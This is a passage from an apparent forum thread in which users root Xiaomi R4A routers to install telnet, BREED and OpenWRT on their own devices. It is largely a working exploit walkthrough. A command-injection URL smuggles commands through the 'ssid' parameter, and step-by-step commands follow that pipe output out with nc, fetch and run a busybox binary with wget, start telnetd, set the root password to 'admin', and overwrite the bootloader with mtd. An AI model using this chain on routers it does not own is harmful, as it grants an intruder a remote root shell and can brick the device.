As I don't like splitting raw binaries, I decided to convert my binary to base64 first. You can do it here, by example: https://base64.guru/converter/encode/file

To split the resulting base64 file into pieces, run split -b 6K base64.txt on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)

The result of this command will be a folder full of files named xaa, xab, xac... I uploaded all of them to a separate folder on the router (/tmp/split), using the ncat method described above.

Then, I had to combine them back into a single file. To do that, run cat /tmp/split/x* > /tmp/split/final.txt on your router.

To decode a base64 encoded file into a binary, run base64 -d /tmp/split/final.txt > /tmp/split/final on your router.

To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running md5sum /tmp/split/final on the router.

Then, make the file executable by running chmod +x /tmp/split/final on your router.

And finally, the file is ready to be executed.

Shell access

In my case, I uploaded a precompiled busybox binary with telnet supported.

I ran it /tmp/split/final telnetd on my router, and the telnet server was successfully launched.

Then, I connected to it by running telnet 192.168.31.1 on my PC.

Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads: upl_file.py.zip

To use it, first, edit the script to configure your PC's IP addr and router's STOK. Then, make a /tmp/split folder by executing mkdir /tmp/split/ on the router. Create a new folder on your PC called split in the same folder where your script is, and put all xaa, xab, xac... files there. Install requests module for python3 if not already installed by running pip3 install requests --user on your PC. And finally, run the script by executing python3 upl_file.py on your PC

I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.

Known working busybox binary: busybox.zip

For the lazy ones, here's an already split busybox binary: split_busybox.zip

thx
your upload script helped me a lot
i can execute commands and get output by 'nc -l 1234' and 'ls /tmp/* | nc my_pc 1234'
then i found wget command is available in my v2 router 'wget --help | nc my_pc 1234'
and upload busybox 'wget -O /tmp/busybox http://my_pc/busybox'
also 'md5sum /tmp/busybox | nc my_pc 1234'; 'chmod a+x /tmp/busybox && /tmp/busybox telnetd'
the root password could generate here: https://miwifi.gq/

Answer 95 · 2024-09-03T11:19:06.000Z

Hi folks,

Building upon the previous post, I ended up coding a micro interactive shell for my Xiaomi RA4 to install busybox.

Here are the full commands to install telnet:

mkdir xiaomir4a
cd xiaomir4a
wget https://github.com/acecilia/OpenWRTInvasion/files/9894805/busybox.zip
unzip busybox.zip busybox
python3 -m http.server 8080

Open a new terminal session and place it side by side so you see the result of the commands on the router

wget https://raw.githubusercontent.com/licryle/Scripts/main/xiaomi_r4a.py
python3 xiaomi_r4a.py
# Enter values then type the commands in the micro shell
wget -O /tmp/busybox http://192.168.31.[YOUR IP]:8080/busybox
ls /tmp/busybox
chmod +x /tmp/busybox
/tmp/busybox telnetd
echo -e 'admin\nadmin' | passwd root;
exit

If all goes well, you can telnet 192.168.31.1 and credentials will be root:admin

Here's an example:

$ python3 xiaomi.py
What's the stok:
07f87f0a8a861e08ef00fe0a82c991c2
What's your PC IP:
192.168.31.147
NC port:
12345
Welcome - enter "exit" to exit or a command:
$ uname -a
Linux XiaoQiang 4.4.198.mt7621 #0 SMP Thu Sep 29 02:26:15 2022 mips GNU/Linux
<Response [200]>

$ pwd
/
<Response [200]>

$ exit

Answer 96 · 2024-09-03T16:56:53.000Z

(variation from previous post to install BREED directly and skip busybox altogether, I considered merging them both, but busybox might be of interest to someone else)

Building upon the previous post, I ended up coding a micro interactive shell for my Xiaomi RA4 to flash BREED directly.

BREED flashing instructions are courtesy of (@MrTaiKe - full readme) and are AT YOUR OWN RISK. You may brick your device, you're on your own :)

Here are the full commands to flash BREED:

mkdir xiaomir4a
cd xiaomir4a
wget -O breed.bin https://breed.hackpascal.net/breed-mt7621-pbr-m1.bin
python3 -m http.server 8080

Open a new terminal session and place it side by side so you see the result of the commands on the router

wget https://raw.githubusercontent.com/licryle/Scripts/main/xiaomi_r4a.py
python3 xiaomi_r4a.py
# Enter values then type the commands in the micro shell
wget -O /tmp/breed.bin http://192.168.31.[YOUR IP]:8080/breed.bin
mtd -r write /tmp/breed.bin Bootloader
exit

It should write, then reboot (the message will say "rebooting").

After this, the router should have faint blue LEDs.
Change your computer's network to:
ip: 192.168.1.2
gateway: 192.168.1.1

Go to http://192.168.1.1/ and be faced with the BREED.
Flash both at the same time:

eeprom.bin (which you extract from BREED )
openwrt-ramips-mt7621-xiaomi_mi-router-4a-gigabit-v2-squashfs-sysupgrade.bin (latest asset)

And voila! You should have OpenWRT.
In my case, I did run into the BREED infinite loop and followed that procedure

Note: before flashing, you can confirm the device model in the micro-shell by typing the commend bootinfo. The model will tell you if it's R4AGv2. (Gigabit V2)

Answer 97 · 2024-09-08T16:39:43.000Z

http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A

Hi! Where can I find bssid and user_id values?

http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A

Answer 98 · 2024-09-08T16:43:28.000Z

For me, no values were needed. XXXXXX worked. I hardcoded it in my script actually.

Answer 99 · 2024-09-08T17:02:08.000Z

For me, no values were needed. XXXXXX worked. I hardcoded it in my script actually.

Thank you for the quick reply!
Actually I managed to get reboot of my router but I couldn't upload or download files. I have 20.30.28 firmware